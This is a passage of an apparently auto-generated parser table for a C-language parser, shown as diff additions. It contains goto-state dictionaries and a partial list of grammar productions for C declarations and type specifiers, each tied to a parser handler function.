175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,]),'translation_unit_or_empty':([0,],[9,]),'initializer_list_opt':([227,],[370,]),'brace_close':([99,184,185,186,196,309,313,315,325,326,370,472,528,550,],[187,314,316,317,328,439,442,443,448,449,469,523,551,565,]),'direct_typeid_declarator':([4,69,72,89,126,192,202,445,],[73,73,127,73,73,73,73,73,]),'external_declaration':([0,59,],[16,123,]),'pragmacomp_or_statement':([307,429,440,502,535,537,539,569,574,577,],[436,500,506,536,554,555,557,576,578,579,]),'type_name':([85,95,174,229,231,233,239,267,],[157,183,271,379,380,381,382,410,]),'typedef_name':([0,21,40,59,75,85,91,93,95,99,118,129,172,174,181,184,185,186,214,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,]),'pppragma_directive':([0,59,99,181,184,185,186,298,307,313,315,429,437,440,502,535,537,539,569,574,577,],[25,25,189,300,189,189,189,300,437,189,189,437,300,437,437,437,437,437,437,437,437,]),'statement':([181,298,307,429,437,440,502,535,537,539,569,574,577,],[301,301,438,438,505,438,438,438,438,558,438,438,438,]),'cast_expression':([85,116,131,171,174,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[158,158,158,268,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,487,158,158,158,158,158,158,158,158,158,158,487,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,]),'atomic_specifier':([0,1,21,27,40,52,53,55,59,63,75,85,87,91,93,95,99,118,129,172,174,181,184,185,186,214,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[27,63,87,63,111,63,63,63,27,63,87,111,63,111,87,111,111,27,27,111,111,87,111,111,111,111,111,111,111,111,111,27,87,111,111,27,27,27,87,27,]),'struct_declarator_list':([192,],[320,]),'empty':([0,1,4,21,27,35,40,52,53,55,63,75,87,89,91,117,118,128,129,177,181,192,204,206,211,218,220,227,278,282,298,307,342,419,421,422,427,429,437,440,459,460,472,488,499,502,513,515,533,535,537,539,550,553,566,569,574,577,],[57,64,83,88,64,106,115,64,64,64,64,88,64,83,115,106,208,106,208,277,306,321,337,106,277,337,106,377,415,106,433,433,415,337,337,415,433,433,433,433,106,208,522,522,433,433,337,106,433,433,433,433,522,433,433,433,433,433,]),'parameter_declaration':([118,129,278,342,350,422,460,],[210,210,210,210,463,210,210,]),'primary_expression':([85,116,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,161,]),'declaration':([0,21,59,75,93,181,298,427,],[38,90,38,90,182,302,302,499,]),'declaration_specifiers_no_type':([0,1,21,27,52,53,55,59,63,75,87,93,118,129,181,278,298,342,350,422,427,460,],[40,67,91,67,67,67,67,40,67,91,67,91,214,214,91,214,91,214,214,214,91,214,]),'jump_statement':([181,298,307,429,437,440,502,535,537,539,569,574,577,],[303,303,303,303,303,303,303,303,303,303,303,303,303,]),'enumerator_list':([102,193,194,],[196,325,326,]),'block_item':([181,298,],[305,432,]),'constant_expression':([85,116,297,319,329,373,447,],[159,203,431,444,451,471,509,]),'identifier_list_opt':([118,129,460,],[207,221,516,]),'constant':([85,116,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,]),'type_specifier_no_typeid':([0,4,21,40,59,75,85,89,91,93,95,99,118,129,172,174,177,181,184,185,186,192,211,214,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[12,71,12,12,12,12,12,71,12,12,12,12,12,12,12,12,275,12,12,12,12,275,71,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,]),'struct_declaration':([99,184,185,186,313,315,],[190,190,190,318,318,318,]),'direct_typeid_noparen_declarator':([211,344,],[345,458,]),'id_declarator':([0,4,37,40,59,69,89,91,126,192,202,211,342,445,],[21,75,107,110,21,107,179,110,179,179,179,346,107,179,]),'selection_statement':([181,298,307,429,437,440,502,535,537,539,569,574,577,],[308,308,308,308,308,308,308,308,308,308,308,308,308,]),'postfix_expression':([85,116,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,168,]),'initializer_list':([227,488,],[374,528,]),'unary_operator':([85,116,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,171,]),'struct_or_union':([0,21,40,59,75,85,91,93,95,99,118,129,172,174,181,184,185,186,214,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,]),'block_item_list_opt':([181,],[309,]),'assignment_expression':([131,174,181,201,204,218,229,231,233,258,265,266,290,298,307,338,339,353,354,364,375,412,419,421,427,429,430,434,437,440,441,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[228,272,272,228,335,335,272,272,272,272,272,408,272,272,272,455,456,466,467,468,228,486,335,335,272,272,272,272,272,272,272,525,272,272,335,228,272,272,272,272,272,561,562,272,272,272,272,272,272,]),'designation_opt':([227,472,488,550,],[375,521,375,521,]),'parameter_type_list':([118,129,278,342,422,460,],[209,222,416,416,416,517,]),'type_qualifier_list':([35,85,95,99,117,128,174,184,185,186,206,220,229,231,233,239,267,282,313,315,459,515,],[103,172,172,172,205,219,172,172,172,172,103,103,172,172,172,172,172,103,172,172,514,103,]),'designator':([227,376,472,488,550,],[371,474,371,371,371,]),'id_init_declarator_list_opt':([40,91,],[114,114,]),'declaration_specifiers':([0,21,59,75,93,118,129,181,278,298,342,350,422,427,460,],[4,89,4,89,89,211,211,89,211,89,211,211,211,89,211,]),'identifier_list':([118,129,460,],[212,212,212,]),'declaration_list_opt':([21,75,],[92,130,]),'function_definition':([0,59,],[45,45,]),'binary_expression':([85,116,131,174,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,419,421,427,429,430,434,437,440,441,447,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[162,162,162,162,162,162,162,162,162,162,162,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,162,400,401,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,]),'enum_specifier':([0,21,40,59,75,85,91,93,95,99,118,129,172,174,181,184,185,186,214,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,]),'decl_body':([0,21,59,75,93,181,298,427,],[51,51,51,51,51,51,51,51,]),'function_specifier':([0,1,4,21,27,52,53,55,59,63,75,87,89,93,118,129,181,211,278,298,342,350,422,427,460,],[55,55,82,55,55,55,55,55,55,55,55,55,82,55,55,55,55,82,55,55,55,55,55,55,55,]),'specifier_qualifier_list':([85,95,99,174,184,185,186,229,231,233,239,267,313,315,],[177,177,192,177,192,192,192,177,177,177,177,177,192,192,]),'conditional_expression':([85,116,131,174,181,201,204,218,229,231,233,258,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,419,421,427,429,430,434,437,440,441,447,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[178,178,225,225,225,225,225,225,225,225,225,225,225,225,225,178,225,225,178,178,225,225,225,225,225,178,225,225,225,225,225,225,225,225,225,225,225,178,524,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,]),} + +_lr_goto = {} +for _k, _v in _lr_goto_items.items(): + for _x, _y in zip(_v[0], _v[1]): + if not _x in _lr_goto: _lr_goto[_x] = {} + _lr_goto[_x][_k] = _y +del _lr_goto_items +_lr_productions = [ + ("S' -> translation_unit_or_empty","S'",1,None,None,None), + ('abstract_declarator_opt -> empty','abstract_declarator_opt',1,'p_abstract_declarator_opt','plyparser.py',43), + ('abstract_declarator_opt -> abstract_declarator','abstract_declarator_opt',1,'p_abstract_declarator_opt','plyparser.py',44), + ('assignment_expression_opt -> empty','assignment_expression_opt',1,'p_assignment_expression_opt','plyparser.py',43), + ('assignment_expression_opt -> assignment_expression','assignment_expression_opt',1,'p_assignment_expression_opt','plyparser.py',44), + ('block_item_list_opt -> empty','block_item_list_opt',1,'p_block_item_list_opt','plyparser.py',43), + ('block_item_list_opt -> block_item_list','block_item_list_opt',1,'p_block_item_list_opt','plyparser.py',44), + ('declaration_list_opt -> empty','declaration_list_opt',1,'p_declaration_list_opt','plyparser.py',43), + ('declaration_list_opt -> declaration_list','declaration_list_opt',1,'p_declaration_list_opt','plyparser.py',44), + ('declaration_specifiers_no_type_opt -> empty','declaration_specifiers_no_type_opt',1,'p_declaration_specifiers_no_type_opt','plyparser.py',43), + ('declaration_specifiers_no_type_opt -> declaration_specifiers_no_type','declaration_specifiers_no_type_opt',1,'p_declaration_specifiers_no_type_opt','plyparser.py',44), + ('designation_opt -> empty','designation_opt',1,'p_designation_opt','plyparser.py',43), + ('designation_opt -> designation','designation_opt',1,'p_designation_opt','plyparser.py',44), + ('expression_opt -> empty','expression_opt',1,'p_expression_opt','plyparser.py',43), + ('expression_opt -> expression','expression_opt',1,'p_expression_opt','plyparser.py',44), + ('id_init_declarator_list_opt -> empty','id_init_declarator_list_opt',1,'p_id_init_declarator_list_opt','plyparser.py',43), + ('id_init_declarator_list_opt -> id_init_declarator_list','id_init_declarator_list_opt',1,'p_id_init_declarator_list_opt','plyparser.py',44), + ('identifier_list_opt -> empty','identifier_list_opt',1,'p_identifier_list_opt','plyparser.py',43), + ('identifier_list_opt -> identifier_list','identifier_list_opt',1,'p_identifier_list_opt','plyparser.py',44), + ('init_declarator_list_opt -> empty','init_declarator_list_opt',1,'p_init_declarator_list_opt','plyparser.py',43), + ('init_declarator_list_opt -> init_declarator_list','init_declarator_list_opt',1,'p_init_declarator_list_opt','plyparser.py',44), + ('initializer_list_opt -> empty','initializer_list_opt',1,'p_initializer_list_opt','plyparser.py',43), + ('initializer_list_opt -> initializer_list','initializer_list_opt',1,'p_initializer_list_opt','plyparser.py',44), + ('parameter_type_list_opt -> empty','parameter_type_list_opt',1,'p_parameter_type_list_opt','plyparser.py',43), + ('parameter_type_list_opt -> parameter_type_list','parameter_type_list_opt',1,'p_parameter_type_list_opt','plyparser.py',44), + ('struct_declarator_list_opt -> empty','struct_declarator_list_opt',1,'p_struct_declarator_list_opt','plyparser.py',43), + ('struct_declarator_list_opt -> struct_declarator_list','struct_declarator_list_opt',1,'p_struct_declarator_list_opt','plyparser.py',44), + ('type_qualifier_list_opt -> empty','type_qualifier_list_opt',1,'p_type_qualifier_list_opt','plyparser.py',43), + ('type_qualifier_list_opt -> type_qualifier_list','type_qualifier_list_opt',1,'p_type_qualifier_list_opt','plyparser.py',44), + ('direct_id_declarator -> ID','direct_id_declarator',1,'p_direct_id_declarator_1','plyparser.py',126), + ('direct_id_declarator -> LPAREN id_declarator RPAREN','direct_id_declarator',3,'p_direct_id_declarator_2','plyparser.py',126), + ('direct_id_declarator -> direct_id_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET','direct_id_declarator',5,'p_direct_id_declarator_3','plyparser.py',126), + ('direct_id_declarator -> direct_id_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET','direct_id_declarator',6,'p_direct_id_declarator_4','plyparser.py',126), + ('direct_id_declarator -> direct_id_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET','direct_id_declarator',6,'p_direct_id_declarator_4','plyparser.py',127), + ('direct_id_declarator -> direct_id_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET','direct_id_declarator',5,'p_direct_id_declarator_5','plyparser.py',126), + ('direct_id_declarator -> direct_id_declarator LPAREN parameter_type_list RPAREN','direct_id_declarator',4,'p_direct_id_declarator_6','plyparser.py',126), + ('direct_id_declarator -> direct_id_declarator LPAREN identifier_list_opt RPAREN','direct_id_declarator',4,'p_direct_id_declarator_6','plyparser.py',127), + ('direct_typeid_declarator -> TYPEID','direct_typeid_declarator',1,'p_direct_typeid_declarator_1','plyparser.py',126), + ('direct_typeid_declarator -> LPAREN typeid_declarator RPAREN','direct_typeid_declarator',3,'p_direct_typeid_declarator_2','plyparser.py',126), + ('direct_typeid_declarator -> direct_typeid_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET','direct_typeid_declarator',5,'p_direct_typeid_declarator_3','plyparser.py',126), + ('direct_typeid_declarator -> direct_typeid_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET','direct_typeid_declarator',6,'p_direct_typeid_declarator_4','plyparser.py',126), + ('direct_typeid_declarator -> direct_typeid_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET','direct_typeid_declarator',6,'p_direct_typeid_declarator_4','plyparser.py',127), + ('direct_typeid_declarator -> direct_typeid_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET','direct_typeid_declarator',5,'p_direct_typeid_declarator_5','plyparser.py',126), + ('direct_typeid_declarator -> direct_typeid_declarator LPAREN parameter_type_list RPAREN','direct_typeid_declarator',4,'p_direct_typeid_declarator_6','plyparser.py',126), + ('direct_typeid_declarator -> direct_typeid_declarator LPAREN identifier_list_opt RPAREN','direct_typeid_declarator',4,'p_direct_typeid_declarator_6','plyparser.py',127), + ('direct_typeid_noparen_declarator -> TYPEID','direct_typeid_noparen_declarator',1,'p_direct_typeid_noparen_declarator_1','plyparser.py',126), + ('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET','direct_typeid_noparen_declarator',5,'p_direct_typeid_noparen_declarator_3','plyparser.py',126), + ('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET','direct_typeid_noparen_declarator',6,'p_direct_typeid_noparen_declarator_4','plyparser.py',126), + ('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET','direct_typeid_noparen_declarator',6,'p_direct_typeid_noparen_declarator_4','plyparser.py',127), + ('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET','direct_typeid_noparen_declarator',5,'p_direct_typeid_noparen_declarator_5','plyparser.py',126), + ('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LPAREN parameter_type_list RPAREN','direct_typeid_noparen_declarator',4,'p_direct_typeid_noparen_declarator_6','plyparser.py',126), + ('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LPAREN identifier_list_opt RPAREN','direct_typeid_noparen_declarator',4,'p_direct_typeid_noparen_declarator_6','plyparser.py',127), + ('id_declarator -> direct_id_declarator','id_declarator',1,'p_id_declarator_1','plyparser.py',126), + ('id_declarator -> pointer direct_id_declarator','id_declarator',2,'p_id_declarator_2','plyparser.py',126), + ('typeid_declarator -> direct_typeid_declarator','typeid_declarator',1,'p_typeid_declarator_1','plyparser.py',126), + ('typeid_declarator -> pointer direct_typeid_declarator','typeid_declarator',2,'p_typeid_declarator_2','plyparser.py',126), + ('typeid_noparen_declarator -> direct_typeid_noparen_declarator','typeid_noparen_declarator',1,'p_typeid_noparen_declarator_1','plyparser.py',126), + ('typeid_noparen_declarator -> pointer direct_typeid_noparen_declarator','typeid_noparen_declarator',2,'p_typeid_noparen_declarator_2','plyparser.py',126), + ('translation_unit_or_empty -> translation_unit','translation_unit_or_empty',1,'p_translation_unit_or_empty','c_parser.py',509), + ('translation_unit_or_empty -> empty','translation_unit_or_empty',1,'p_translation_unit_or_empty','c_parser.py',510), + ('translation_unit -> external_declaration','translation_unit',1,'p_translation_unit_1','c_parser.py',518), + ('translation_unit -> translation_unit external_declaration','translation_unit',2,'p_translation_unit_2','c_parser.py',524), + ('external_declaration -> function_definition','external_declaration',1,'p_external_declaration_1','c_parser.py',534), + ('external_declaration -> declaration','external_declaration',1,'p_external_declaration_2','c_parser.py',539), + ('external_declaration -> pp_directive','external_declaration',1,'p_external_declaration_3','c_parser.py',544), + ('external_declaration -> pppragma_directive','external_declaration',1,'p_external_declaration_3','c_parser.py',545), + ('external_declaration -> SEMI','external_declaration',1,'p_external_declaration_4','c_parser.py',550), + ('external_declaration -> static_assert','external_declaration',1,'p_external_declaration_5','c_parser.py',555), + ('static_assert -> _STATIC_ASSERT LPAREN constant_expression COMMA unified_string_literal RPAREN','static_assert',6,'p_static_assert_declaration','c_parser.py',560), + ('static_assert -> _STATIC_ASSERT LPAREN constant_expression RPAREN','static_assert',4,'p_static_assert_declaration','c_parser.py',561), + ('pp_directive -> PPHASH','pp_directive',1,'p_pp_directive','c_parser.py',569), + ('pppragma_directive -> PPPRAGMA','pppragma_directive',1,'p_pppragma_directive','c_parser.py',575), + ('pppragma_directive -> PPPRAGMA PPPRAGMASTR','pppragma_directive',2,'p_pppragma_directive','c_parser.py',576), + ('function_definition -> id_declarator declaration_list_opt compound_statement','function_definition',3,'p_function_definition_1','c_parser.py',586), + ('function_definition -> declaration_specifiers id_declarator declaration_list_opt compound_statement','function_definition',4,'p_function_definition_2','c_parser.py',604), + ('statement -> labeled_statement','statement',1,'p_statement','c_parser.py',619), + ('statement -> expression_statement','statement',1,'p_statement','c_parser.py',620), + ('statement -> compound_statement','statement',1,'p_statement','c_parser.py',621), + ('statement -> selection_statement','statement',1,'p_statement','c_parser.py',622), + ('statement -> iteration_statement','statement',1,'p_statement','c_parser.py',623), + ('statement -> jump_statement','statement',1,'p_statement','c_parser.py',624), + ('statement -> pppragma_directive','statement',1,'p_statement','c_parser.py',625), + ('statement -> static_assert','statement',1,'p_statement','c_parser.py',626), + ('pragmacomp_or_statement -> pppragma_directive statement','pragmacomp_or_statement',2,'p_pragmacomp_or_statement','c_parser.py',674), + ('pragmacomp_or_statement -> statement','pragmacomp_or_statement',1,'p_pragmacomp_or_statement','c_parser.py',675), + ('decl_body -> declaration_specifiers init_declarator_list_opt','decl_body',2,'p_decl_body','c_parser.py',694), + ('decl_body -> declaration_specifiers_no_type id_init_declarator_list_opt','decl_body',2,'p_decl_body','c_parser.py',695), + ('declaration -> decl_body SEMI','declaration',2,'p_declaration','c_parser.py',755), + ('declaration_list -> declaration','declaration_list',1,'p_declaration_list','c_parser.py',764), + ('declaration_list -> declaration_list declaration','declaration_list',2,'p_declaration_list','c_parser.py',765), + ('declaration_specifiers_no_type -> type_qualifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_1','c_parser.py',775), + ('declaration_specifiers_no_type -> storage_class_specifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_2','c_parser.py',780), + ('declaration_specifiers_no_type -> function_specifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_3','c_parser.py',785), + ('declaration_specifiers_no_type -> atomic_specifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_4','c_parser.py',792), + ('declaration_specifiers_no_type -> alignment_specifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_5','c_parser.py',797), + ('declaration_specifiers -> declaration_specifiers type_qualifier','declaration_specifiers',2,'p_declaration_specifiers_1','c_parser.py',802), + ('declaration_specifiers -> declaration_specifiers storage_class_specifier','declaration_specifiers',2,'p_declaration_specifiers_2','c_parser.py',807), + ('declaration_specifiers -> declaration_specifiers function_specifier','declaration_specifiers',2,'p_declaration_specifiers_3','c_parser.py',812), + ('declaration_specifiers -> declaration_specifiers type_specifier_no_typeid','declaration_specifiers',2,'p_declaration_specifiers_4','c_parser.py',817), + ('declaration_specifiers -> type_specifier','declaration_specifiers',1,'p_declaration_specifiers_5','c_parser.py',822), + ('declaration_specifiers -> declaration_specifiers_no_type type_specifier','declaration_specifiers',2,'p_declaration_specifiers_6','c_parser.py',827), + ('declaration_specifiers -> declaration_specifiers alignment_specifier','declaration_specifiers',2,'p_declaration_specifiers_7','c_parser.py',832), + ('storage_class_specifier -> AUTO','storage_class_specifier',1,'p_storage_class_specifier','c_parser.py',837), + ('storage_class_specifier -> REGISTER','storage_class_specifier',1,'p_storage_class_specifier','c_parser.py',838), + ('storage_class_specifier -> STATIC','storage_class_specifier',1,'p_storage_class_specifier','c_parser.py',839), + ('storage_class_specifier -> EXTERN','storage_class_specifier',1,'p_storage_class_specifier','c_parser.py',840), + ('storage_class_specifier -> TYPEDEF','storage_class_specifier',1,'p_storage_class_specifier','c_parser.py',841), + ('storage_class_specifier -> _THREAD_LOCAL','storage_class_specifier',1,'p_storage_class_specifier','c_parser.py',842), + ('function_specifier -> INLINE','function_specifier',1,'p_function_specifier','c_parser.py',847), + ('function_specifier -> _NORETURN','function_specifier',1,'p_function_specifier','c_parser.py',848), + ('type_specifier_no_typeid -> VOID','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',853), + ('type_specifier_no_typeid -> _BOOL','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',854), + ('type_specifier_no_typeid -> CHAR','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',855), + ('type_specifier_no_typeid -> SHORT','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',856), + ('type_specifier_no_typeid -> INT','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',857), + ('type_specifier_no_typeid -> LONG','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',858), + ('type_specifier_no_typeid -> FLOAT','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',859), + ('type_specifier_no_typeid -> DOUBLE','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',860), + ('type_specifier_no_typeid -> _COMPLEX','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',861), + ('type_specifier_no_typeid -> SIGNED','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',862), + ('type_specifier_no_typeid -> UNSIGNED','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',863), + ('type_specifier_no_typeid -> __INT128','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','c_parser.py',864), + ('type_specifier -> typedef_name','type_specifier',1,'p_type_specifier','c_parser.py',869), + ('type_specifier -> enum_specifier','type_specifier',1,'p_type_specifier','c_parser.py',870), + ('type_specifier -> struct_or_union_specifier','type_specifier',1,'p_type_specifier','c_parser.py',871), + ('type_specifier -> type_specifier_no_typeid','type_specifier',1,'p_type_specifier','c_parser.py',872), + ('type_specifier -> atomic_specifier','type_specifier',1,'p_type_specifier','c_parser.py',873), + ('atomic_specifier -> _ATOMIC LPAREN type_name RPAREN','atomic_specifier',4,'p_atomic_specifier','c_parser.py',879), + ('type_qualifier -> CONST','type_qualifier',1,'p_type_qualifier','c_parser.py',886), + ('type_qualifier -> RESTRICT','type_qualifier',1,'p_type_qualifier','c_parser.py',887), + ('type_qualifier -> VOLATILE','type_qualifier',1,'p_type_qualifier','c_parser.py',888), + ('type_qualifier -> _ATOMIC','type_qualifier',1,'p_type_qualifier','c_parser.py',889), + ('init_declarator_list -> init_declarator','init_declarator_list',1,'p_init_declarator_list','c_parser.py',894), + ('init_declarator_list -> init_declarator_list COMMA init_declarator','init_declarator_list',3,'p_init_declarator_list','c_parser.py',895), + ('init_declarator -> declarator','init_declarator',1,'p_init_declarator','c_parser.py',903), + ('init_declarator -> declarator EQUALS initializer','init_declarator',3,'p_init_declarator','c_parser.py',904), + ('id_init_declarator_list -> id_init_declarator','id_init_declarator_list',1,'p_id_init_declarator_list','c_parser.py',909), + ('id_init_declarator_list -> id_init_declarator_list COMMA init_declarator','id_init_declarator_list',3,'p_id_init_declarator_list','c_parser.py',910), + ('id_init_declarator -> id_declarator','id_init_declarator',1,'p_id_init_declarator','c_parser.py',915), + ('id_init_declarator -> id_declarator EQUALS initializer','id_init_declarator',3,'p_id_init_declarator','c_parser.py',916), + ('specifier_qualifier_list -> specifier_qualifier_list type_specifier_no_typeid','specifier_qualifier_list',2,'p_specifier_qualifier_list_1','c_parser.py',923), + ('specifier_qualifier_list -> specifier_qualifier_list type_qualifier','specifier_qualifier_list',2,'p_specifier_qualifier_list_2','c_parser.py',928), + ('specifier_qualifier_list -> type_specifier','specifier_qualifier_list',1,'p_specifier_qualifier_list_3','c_parser.py',933), + ('specifier_qualifier_list -> type_qualifier_list type_specifier','specifier_qualifier_list',2,'p_specifier_qualifier_list_4','c_parser.py',938), + ('specifier_qualifier_list -> alignment_specifier','specifier_qualifier_list',1,'p_specifier_qualifier_list_5','c_parser.py',943), + ('specifier_qualifier_list -> specifier_qualifier_list alignment_specifier','specifier_qualifier_list',2,'p_specifier_qualifier_list_6','c_parser.py',948), + ('struct_or_union_specifier -> struct_or_union ID','struct_or_union_specifier',2,'p_struct_or_union_specifier_1','c_parser.py',956), + ('struct_or_union_specifier -> struct_or_union TYPEID','struct_or_union_specifier',2,'p_struct_or_union_specifier_1','c_parser.py',957), + ('struct_or_union_specifier -> struct_or_union brace_open struct_declaration_list brace_close','struct_or_union_specifier',4,'p_struct_or_union_specifier_2','c_parser.py',967), + ('struct_or_union_specifier -> struct_or_union brace_open brace_close','struct_or_union_specifier',3,'p_struct_or_union_specifier_2','c_parser.py',968), + ('struct_or_union_specifier -> struct_or_union ID brace_open struct_declaration_list brace_close','struct_or_union_specifier',5,'p_struct_or_union_specifier_3','c_parser.py',985), + ('struct_or_union_specifier -> struct_or_union ID brace_open brace_close','struct_or_union_specifier',4,'p_struct_or_union_specifier_3','c_parser.py',986), + ('struct_or_union_specifier -> struct_or_union TYPEID brace_open struct_declaration_list brace_close','struct_or_union_specifier',5,'p_struct_or_union_specifier_3','c_parser.py',987), + ('struct_or_union_specifier -> struct_or_union TYPEID brace_open brace_close','struct_or_union_specifier',4,'p_struct_or_union_specifier_3','c_parser.py',988), + ('struct_or_union -> STRUCT','struct_or_union',1,'p_struct_or_union','c_parser.py',1004), + ('struct_or_union -> UNION','struct_or_union',1,'p_struct_or_union','c_parser.py',1005), + ('struct_declaration_list -> struct_declaration','struct_declaration_list',1,'p_struct_declaration_list','c_parser.py',1012), + ('struct_declaration_list -> struct_declaration_list struct_declaration','struct_declaration_list',2,'p_struct_declaration_list','c_parser.py',1013), + ('struct_declaration -> specifier_qualifier_list struct_declarator_list_opt SEMI','struct_declaration',3,'p_struct_declaration_1','c_parser.py',1021), + 